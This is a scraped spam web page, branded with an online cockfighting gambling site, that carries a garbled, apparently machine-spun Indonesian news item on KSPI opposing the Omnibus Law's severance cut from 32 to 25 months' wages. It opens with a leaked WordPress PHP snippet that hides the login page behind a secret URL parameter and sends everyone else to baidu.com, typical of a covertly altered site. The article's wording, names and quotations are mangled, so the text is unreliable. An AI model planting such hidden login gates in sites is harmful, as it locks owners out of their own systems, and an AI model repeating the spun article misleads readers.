//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Yang merugikan pekerja, KSPI menolak rencana PHK yang mubazir dalam UU Cipta Kerja. | download game adu ayam_s128live_situs sabung ayam online

Yang merugikan pekerja, KSPI menolak rencana PHK yang mubazir dalam UU Cipta Kerja.

Jakarta, TRIBUNNEWS.COM-Federasi Serikat Pekerja Indonesia (KSPI) menolak untuk menurunkan uang pesangon (PHK) untuk pemecatan berdasarkan Undang-Undang Pemberhentian Kerja Secara Menyeluruh (RUU). Menurut Undang-Undang Ketenagakerjaan No. 13 tahun 2003, jumlah pesangon maksimum tidak melebihi 32 kali gaji.

Dalam “UU Cipta Kerja”, metode penghitungan pesangon untuk pemberhentian diubah menjadi 19 kali gaji ditambah 6 kali jaminan kehilangan pekerjaan (JKP), sehingga totalnya menjadi 25 kali gaji. – “Buruh menolak untuk menurunkan nilai pesangon dari 32 bulan gaji menjadi 25 bulan,” kata Presiden Said Iqbal menerima keterangan tertulis di Kompas.com, Sabtu (10/10/2020). Kata dalam.

Saïd Iqbal (Saïd Iqbal) juga mempertanyakan sumber dana Badan Penyelenggara Jaminan Sosial (BPJS) untuk membayar gaji pekerja. Pendanaan tidak jelas.

Dari mana ‘D’BPJS mendapatkan dana? Dengan kata lain, meskipun rencana baru diterapkan, nilai pesangon akan turun, yakni gaji 23 bulan yang dibayarkan oleh pemberi kerja dan gaji 9 bulan yang dibayarkan oleh BPJS Ketenagakerjaan, “kata Iqbal. Iqbal mengatakan:” BPJS untuk pekerja Uang pesangon dibayarkan selama 9 bulan. “Sebelumnya, pemerintah dan Republik Demokratik Rakyat sepakat untuk meloloskan cluster ketenagakerjaan dalam” UU Cipta Kerja “untuk mengurangi pesangon PHK, yaitu 6 kali Uang Jaminan (JKP) para penganggur, dan menjadikan total gaji 25 kali gaji. — “Dengan mengembangkan dan memperhatikan situasi saat ini, terutama dampak pandemi Covid-19, beban ini dapat diperhitungkan kembali. “

Leave a Comment

download game adu ayam_s128live_situs sabung ayam online